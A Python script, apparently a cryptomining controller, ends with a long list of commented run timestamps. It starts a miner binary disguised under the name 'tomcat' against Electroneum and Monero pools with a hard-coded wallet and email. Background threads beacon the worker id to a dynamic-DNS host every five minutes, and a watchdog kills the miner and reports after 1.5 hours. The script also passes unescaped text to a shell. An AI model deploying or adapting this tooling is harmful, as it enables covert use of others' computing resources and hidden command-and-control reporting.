import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:05.063391
#2018-02-17 15:55:06.458037
#2018-02-17 17:43:06.705584
#2018-02-17 19:29:05.789116
#2018-02-17 21:17:06.947705
#2018-02-17 23:01:06.412803
#2018-02-18 00:48:07.398538
#2018-02-18 02:37:04.272820
#2018-02-18 04:24:07.403575
#2018-02-18 06:17:02.086329
#2018-02-18 08:07:04.378335
#2018-02-18 09:54:05.631177
#2018-02-18 11:41:05.301566
#2018-02-18 13:26:07.521051
#2018-02-18 15:16:01.231241
#2018-02-18 17:05:04.025161
#2018-02-18 18:52:03.183679
#2018-02-18 20:38:07.781486
#2018-02-18 22:24:03.962203
#2018-02-19 00:13:05.435997
#2018-02-19 01:59:05.627459
#2018-02-19 03:46:07.147892
#2018-02-19 05:30:09.165383
#2018-02-19 07:19:02.119724
#2018-02-19 09:08:01.272989
#2018-02-19 10:57:06.044160
#2018-02-19 12:44:07.825140
#2018-02-19 14:32:08.330759
#2018-02-19 16:19:09.280437
#2018-02-19 18:07:06.637516
#2018-02-19 19:54:02.008061
#2018-02-19 21:40:10.538565
#2018-02-19 23:26:05.191332
#2018-02-20 01:12:03.337175
#2018-02-20 03:02:05.827608
#2018-02-20 04:48:05.173869
#2018-02-20 06:32:01.798717
#2018-02-20 08:16:01.792059
#2018-02-20 10:01:06.570887
#2018-02-20 11:45:09.870464
#2018-02-20 13:32:01.380221
#2018-02-20 15:16:01.324010
#2018-02-20 17:03:02.112747
#2018-02-20 18:50:01.460717
#2018-02-20 20:35:04.525721
#2018-02-20 22:19:05.826984
#2018-02-21 00:00:07.972646
#2018-02-21 01:46:06.453230
#2018-02-21 03:34:01.300843
#2018-02-21 05:23:01.856555
#2018-02-21 07:10:06.425942
#2018-02-21 08:55:08.658639
#2018-02-21 10:43:01.313592
#2018-02-21 12:30:02.108996
#2018-02-21 14:16:08.245966
#2018-02-21 16:03:09.768098
#2018-02-21 17:53:04.346339
#2018-02-21 19:38:03.921143
#2018-02-21 21:26:06.105938
#2018-02-21 23:13:01.475306
#2018-02-22 01:03:05.408238
#2018-02-22 02:50:08.102442
#2018-02-22 04:36:07.118465
#2018-02-22 06:21:06.202285
#2018-02-22 08:08:04.500542
#2018-02-22 09:54:09.692971
#2018-02-22 11:39:09.397680
#2018-02-22 13:26:08.336046
#2018-02-22 15:15:11.615982
#2018-02-22 17:02:04.532696
#2018-02-22 18:48:05.079316
#2018-02-22 20:39:07.476755
#2018-02-22 22:24:08.181118
#2018-02-23 00:10:04.105045
#2018-02-23 01:58:06.198633
#2018-02-23 03:47:05.208082
#2018-02-23 05:36:05.968055
#2018-02-23 07:21:05.202855
#2018-02-23 09:25:07.182816
#2018-02-23 11:32:04.854586
#2018-02-23 13:24:09.493944
#2018-02-23 15:12:07.825046
#2018-02-23 17:00:15.552014
#2018-02-23 18:49:10.947945
#2018-02-23 20:36:01.499183
#2018-02-23 22:23:07.883507
#2018-02-24 00:09:04.969250
#2018-02-24 02:01:06.462149
#2018-02-24 03:51:04.818906
#2018-02-24 05:37:01.950086
#2018-02-24 07:24:01.792045
#2018-02-24 09:13:06.583998
#2018-02-24 11:09:05.020979
#2018-02-24 12:57:06.001089
#2018-02-24 14:45:05.654660
#2018-02-24 16:37:07.505184
#2018-02-24 18:26:06.585615
#2018-02-24 20:12:02.134632
#2018-02-24 21:58:04.880139
#2018-02-25 00:58:03.959700
#2018-02-25 03:54:08.147246
#2018-02-25 06:39:04.170768
#2018-02-25 11:36:07.194522
#2018-02-25 13:46:01.706917
#2018-02-25 15:20:02.751729